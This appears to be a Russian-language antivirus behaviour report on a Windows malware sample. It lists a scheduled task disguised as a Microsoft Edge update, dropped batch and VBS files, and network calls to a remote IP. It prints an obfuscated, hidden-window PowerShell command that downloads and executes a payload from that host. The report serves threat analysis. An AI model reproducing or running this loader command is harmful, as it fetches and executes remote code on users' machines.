Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoftedgeupdate
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\ytdon.bat
- C:\users\public\ytdon.vbs
Сетевая активность
Подключается к
- '45.##8.16.89':222
TCP
Запросы HTTP GET
- http://45.###.16.89:222/coder.jpg via 45.##8.16.89
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]...
